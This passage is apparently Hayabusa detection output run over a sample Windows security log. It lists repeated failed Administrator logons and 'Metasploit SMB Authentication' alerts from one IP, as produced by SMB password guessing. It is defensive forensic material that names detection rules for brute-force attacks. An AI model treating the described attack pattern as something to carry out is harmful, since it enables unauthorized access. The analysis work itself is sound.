20222016-09-20 01:50:27.897 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: aTHHCX9EoKRY4zhR : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20232016-09-20 01:50:27.897 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20242016-09-20 01:50:27.939 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: f1jhH08oLzpONDpa : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20252016-09-20 01:50:27.939 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20262016-09-20 01:50:27.976 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: o2YK7zc7Ne9c8txA : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20272016-09-20 01:50:27.976 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20282016-09-20 01:50:28.013 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 86CrOo9CFreIzSM5 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20292016-09-20 01:50:28.013 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20302016-09-20 01:50:28.056 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 0X9UEojEnc350xPc : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20312016-09-20 01:50:28.056 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20322016-09-20 01:50:28.096 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 9g3PO3jofnySl92G : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20332016-09-20 01:50:28.096 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20342016-09-20 01:50:28.176 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 5TRndfQmPYuhV0Ri : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20352016-09-20 01:50:28.176 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20362016-09-20 01:50:28.204 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: yyJOdaks4B1sKMDv : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Secu
The file is too large to be shown. View Raw
Reference in New Issue View Git Blame Copy Permalink